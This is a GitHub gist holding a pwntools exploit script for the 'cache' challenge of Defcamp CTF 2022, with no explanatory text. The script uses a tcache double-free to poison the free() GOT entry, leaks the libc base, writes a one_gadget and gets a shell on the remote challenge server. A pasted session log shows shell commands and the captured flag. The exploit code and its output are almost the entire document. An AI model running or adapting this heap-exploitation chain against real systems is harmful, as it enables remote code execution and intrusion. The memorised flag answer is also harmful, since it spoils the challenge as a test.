Skip to content

Instantly share code, notes, and snippets.

@soez

soez/cache.py

Last active February 14, 2022 09:25
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save soez/aac50b007579a0c138998fc1e71b9a6a to your computer and use it in GitHub Desktop.
Save soez/aac50b007579a0c138998fc1e71b9a6a to your computer and use it in GitHub Desktop.
Download ZIP
Defcamp-CTF-2022_cache
Raw
cache.py
from pwn import *
local = False
libc = ELF("./libc.so.6", checksec = False)
binary = ELF("./vuln", checksec = False)
def menu(n):
io.recvuntil("\nChoice: ")
io.sendline(str(n))
def cache_new_admin():
menu(1)
def cache_new_user(s):
menu(2)
io.recvuntil("What is your name: ")
io.sendline(s)
def cache_print_admin():
menu(3)
def cache_edit_user(s):
menu(4)
io.recvuntil("What is your name: ")
io.sendline(s)
def cache_print_user():
menu(5)
io.recvuntil("Students name is ")
return io.recv(6)
def cache_delete_admin():
menu(6)
def cache_delete_user():
menu(7)
io = process(binary.path) if local else remote("34.159.7.96", 32552)
cache_new_user("")
cache_delete_user()
cache_delete_user()
cache_edit_user(p64(binary.got['free']))
cache_new_user("")
cache_new_user("")
libc.address = u64(cache_print_user().ljust(8, '\0')) - 0x9790a
puts = libc.sym['puts']
one_gadget = libc.address + 0x10a38c
log.success("base libc 0x%08x" % libc.address)
log.success("one_gadget 0x%08x" % one_gadget)
cache_edit_user(p64(one_gadget) + p64(puts))
cache_delete_user()
io.interactive()
'''
[+] Opening connection to 34.159.7.96 on port 32552: Done
[+] base libc 0x7f98fd152000
[+] one_gadget 0x7f98fd25c38c
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=3000 groups=3000,2000
$ ls
flag.txt ld-2.27.so libc.so.6 real_flag.txt vuln vuln.c
$ cat real_flag.txt
CTF{ab7bdaa3e5ed17ed326fef624a2d95d6ea62caa3dba6d1e5493936c362eed40e}
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment